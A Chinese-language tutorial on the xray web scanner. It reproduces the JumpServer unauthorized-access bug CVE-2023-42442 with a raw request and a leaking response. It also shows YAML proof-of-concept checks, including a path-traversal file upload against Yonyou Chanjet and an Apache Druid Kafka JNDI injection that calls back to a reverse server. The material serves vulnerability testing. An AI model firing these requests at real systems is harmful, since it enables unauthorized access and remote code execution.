xray下载

社区版下载和使用

注意下载新版的,旧版可能无法加载自定义POC

https://github.com/chaitin/xray/releases

使用方法

查看help

xray_windows_amd64.exe webscan --help

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
Version: 1.9.11/eb0c331d/COMMUNITY

NAME:
   xray - A powerful scanner engine [https://docs.xray.cool]

USAGE:
    [global options] command [command options] [arguments...]

COMMANDS:
   webscan, ws        Run a webscan task
   servicescan, ss    Run a service scan task
   subdomain, sd      Run a subdomain task
   poclint, pl, lint  lint yaml poc
   burp-gamma, btg    Convert the export file of burp historical proxy records to POC format
   transform          transform other script to gamma
   reverse            Run a standalone reverse server
   convert            convert results from json to html or from html to json
   genca              GenerateToFile CA certificate and key
   upgrade            check new version and upgrade self if any updates found
   version            Show version info
   x                  A command that enables all plugins.
You can customize new commands or modify the plugins enabled by a command in the configuration file.
   help, h  Shows a list of commands or help for one command

GLOBAL OPTIONS:
   --config FILE      Load configuration from FILE (default: "config.yaml")
   --log-level value  Log level, choices are debug, info, warn, error, fatal
   --help, -h         show help
[INFO] 2023-09-21 17:36:22 [default:entry.go:226] Loading config file from config.yaml

查看webscan使用

xray_windows_amd64.exe webscan --help

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
Version: 1.9.11/eb0c331d/COMMUNITY

NAME:
    webscan - Run a webscan task

USAGE:
    webscan [command options] [arguments...]

OPTIONS:
   --list, -l                                     list plugins
   --plugins value, --plugin value, --plug value  specify the plugins to run, separated by ','
   --poc value, -p value                          specify the poc to run, separated by ','
   --level value                                  specify the level of poc to run, separated by ','
   --tags value                                   specify the level of poc to run, separated by ','

   --listen value                                 use proxy resource collector, value is proxy addr, (example: 127.0.0.1:1111)
   --basic-crawler value, --basic value           use a basic spider to crawl the target and scan the requests
   --browser-crawler value, --browser value       use a browser spider to crawl the target and scan the requests
   --url-file value, --uf value                   read urls from a local file and scan these urls, one url per line
   --burp-file value, --bf value                  read requests from burpsuite exported file as targets
   --url value, -u value                          scan a **single** url
   --data value, -d value                         data string to be sent through POST (e.g. 'username=admin')
   --raw-request FILE, --rr FILE                  load http raw request from a FILE
   --force-ssl, --fs                              force usage of SSL/HTTPS for raw-request

   --json-output FILE, --jo FILE                  output xray results to FILE in json format
   --html-output FILE, --ho FILE                  output xray result to FILE in HTML format
   --webhook-output value, --wo value             post xray result to url in json format

CVE-2023-42442漏洞复现

参考:https://blog.csdn.net/holyxp/article/details/133066481

https://www.secrss.com/articles/58981

burp发送请求包:

1
2
3
4
5
6
7
8
GET /api/v1/terminal/sessions/?limit=2 HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

查看response

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Sep 2023 08:05:28 GMT
Content-Type: application/json
Content-Length: 1782
Connection: close
Vary: Accept, Accept-Language, Cookie
Allow: GET, POST, PUT, PATCH, DELETE, HEAD, OPTIONS
X-Frame-Options: DENY
Content-Language: en
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
Set-Cookie: SESSION_COOKIE_NAME_PREFIX=jms_; Path=/

{"count":18168,"next":"http://example.com/api/v1/terminal/sessions/?limit=2&offset=2","previous":null,"results":[{"id":"4d2f4dfc-8332-46e1-a691-fe5dbe72fc63","user":"林(lin@example.com)","asset":"林(10.15.168.113)","user_id":"70932e0f-5e36-4086-821a-ee453d01f39f","asset_id":"bac40e7c-27d9-4040-b4ad-b692576ac0c9","account":"@INPUT(ltc)","account_id":"4172edfc-4c65-43af-844d-ad729c98babd","protocol":"rdp","type":{"value":"normal","label":"Normal"},"login_from":{"value":"WT","label":"Web Terminal"},"remote_addr":"172.33.4.215","comment":null,"terminal":{"id":"f4bc8fa3-8ff2-4836-b0a0-17a07c314ce4","name":"[Lion]-centos-73bf114de44f"},"command_amount":0,"org_id":"00000000-0000-0000-0000-000000000002","org_name":"Default","is_success":true,"is_finished":false,"has_replay":false,"has_command":false,"can_replay":false,"can_join":true,"can_terminate":true,"date_start":"2023/09/21 16:04:36 +0800","date_end":null},{"id":"95f80041-4bda-45e5-a513-f4bc55385587","user":"郭(guo@example.com)","asset":"郭(10.18.100.100)","user_id":"74b08df7-cadc-4e9b-a1b7-1dd6a53f0314","asset_id":"6dd5488f-bd7a-4731-817f-85217416a52c","account":"@INPUT(GW)","account_id":"98ab7554-e018-4f3d-b936-c1c9a37b62ab","protocol":"rdp","type":{"value":"normal","label":"Normal"},"login_from":{"value":"WT","label":"Web Terminal"},"remote_addr":"172.33.129.206","comment":null,"terminal":{"id":"f4bc8fa3-8ff2-4836-b0a0-17a07c314ce4","name":"[Lion]-centos-73bf114de44f"},"command_amount":0,"org_id":"00000000-0000-0000-0000-000000000002","org_name":"Default","is_success":true,"is_finished":false,"has_replay":false,"has_command":false,"can_replay":false,"can_join":true,"can_terminate":true,"date_start":"2023/09/21 16:03:41 +0800","date_end":null}]}

自定义POC演示

使用方法,运行单个自定义POC,命令如下:

1
xray_windows_amd64.exe webscan --plugins phantasm --poc .\POC\yaml-poc-fit2cloud-jumpserver-unauthorized_access-CVE-2023-42442.yml --url http://example.com/ --html-output CVE-2023-42442.html --json-output CVE-2023-42442.json

这是一个JumpServer未授权访问漏洞(CVE-2023-42442)。POC如下:

原理很简单,这段代码描述了对服务器响应的检查条件。它要求响应的状态码为200,并且响应体中包含特定的字符串:”count”、”next”、”previous”和”results”。这些条件共同判断了漏洞利用的成功条件。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
name: poc-yaml-jumpserver-session-replay-unauth
transport: http
rules:
  r0:
    request:
      method: GET
      path: /api/v1/terminal/sessions/?limit=1
      follow_redirects: false
    expression: >-
      response.status == 200 && 
      response.body_string.contains('"count":') &&
      response.body_string.contains('"next":') &&
      response.body_string.contains('"previous":') &&
      response.body_string.contains('"results":')
expression: r0()
detail:
  author: Chaitin
  links:
    - https://stack.chaitin.com/techblog/detail/156

执行过程:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
____  ___.________.    ____.   _____.___.
\   \/  /\_   __   \  /  _  \  \__  |   |
 \     /  |    _  _/ /  /_\  \  /   |   |
 /     \  |    |   \/    |    \ \____   |
\___/\  \ |____|   /\____|_   / / _____/
      \_/       \_/        \_/  \/

Version: 1.9.11/eb0c331d/COMMUNITY

[INFO] 2023-09-21 17:03:17 [default:entry.go:226] Loading config file from config.yaml

Enabled plugins: [phantasm]

[INFO] 2023-09-21 17:03:18 [phantasm:phantasm.go:114] found local poc .\POC\yaml-poc-fit2cloud-jumpserver-unauthorized_access-CVE-2023-42442.yml
[INFO] 2023-09-21 17:03:18 [phantasm:phantasm.go:185] 1 pocs have been loaded (debug level will show more details)
[INFO] 2023-09-21 17:03:18 [default:dispatcher.go:444] processing GET http://example.com/
[Vuln: phantasm]
Target           "http://example.com/"
VulnType         "poc-yaml-jumpserver-session-replay-unauth/default"
Author           "Chaitin"
Links            ["https://stack.chaitin.com/techblog/detail/156"]

[*] All pending requests have been scanned
[*] scanned: 1, pending: 0, requestSent: 2, latency: 40.50ms, failedRatio: 0.00%
[INFO] 2023-09-21 17:03:19 [controller:dispatcher.go:573] controller released, task done

最后,打开html报告查看漏洞详情即可。

POC编写指南

如何编写高质量POC:https://docs.xray.cool/#/guide/hiq/summary

规则实验室:https://poc.xray.cool/

可以通过该工具便捷的生成POC,同时可以使用该工具对POC进行格式检查与查重

具体可以查看开发者文档:https://docs.xray.cool/#/guide/README

社区贡献的POC:https://github.com/chaitin/xray/tree/master/pocs

POC示例:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
name: poc-yaml-yonyou-chanjet-file-updoad
manual: true
transport: http
set:
    randstr: randomLowercase(60)
    rboundary: randomLowercase(8)
    randname: randomLowercase(6)
rules:
    r0:
        request:
            cache: true
            method: POST
            path: /tplus/SM/SetupAccount/Upload.aspx?preload=1
            headers:
                Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
            body: "\
            ------WebKitFormBoundary{{rboundary}}\r\n\
            Content-Disposition: form-data; name=\"File1\"; filename=\"../../../img/login/{{randname}}.jpg\"\r\n\
            Content-Type: image/jpeg\r\n\
            \r\n\
            {{randstr}}\r\n\
            ------WebKitFormBoundary{{rboundary}}--\
            "
        expression: response.status == 200
    r1:
        request:
            cache: true
            method: GET
            path: /tplus/img/login/{{randname}}.jpg
        expression: response.status == 200 && response.body.bcontains(bytes(randstr))
expression: r0() && r1()
detail:
    author: Jarcis-cy
    links:
        - https://weibo.com/ttarticle/x/m/show/id/2309404807909669208397?_wb_client_=1
    vulnerability:
        id: CT-475791
        level: critical
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
name: poc-yaml-apache-druid-kafka-rce
transport: http
set:
  reverse: newReverse()
  reverseRMI: reverse.rmi
rules:
  r0:
    request:
      method: POST
      path: /druid/indexer/v1/sampler?for=connect
      follow_redirects: false
      headers:
        Content-Type: application/json
      body: |-
        {
            "type":"kafka",
            "spec":{
                "type":"kafka",
                "ioConfig":{
                    "type":"kafka",
                    "consumerProperties":{
                        "bootstrap.servers":"6.6.6.6:9092",
                        "sasl.mechanism":"SCRAM-SHA-256",
                        "security.protocol":"SASL_SSL",
                        "sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"{{reverseRMI}}\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
                    },
                    "topic":"any",
                    "useEarliestOffset":true,
                    "inputFormat":{
                        "type":"regex",
                        "pattern":"([\\s\\S]*)",
                        "listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965",
                        "columns":[
                            "raw"
                        ]
                    }
                },
                "dataSchema":{
                    "dataSource":"sample",
                    "timestampSpec":{
                        "column":"!!!_no_such_column_!!!",
                        "missingValue":"1970-01-01T00:00:00Z"
                    },
                    "dimensionsSpec":{

                    },
                    "granularitySpec":{
                        "rollup":false
                    }
                },
                "tuningConfig":{
                    "type":"kafka"
                }
            },
            "samplerConfig":{
                "numRows":500,
                "timeoutMs":15000
            }
        }
    expression: reverse.wait(5)
expression: r0()
detail:
  author: chaitin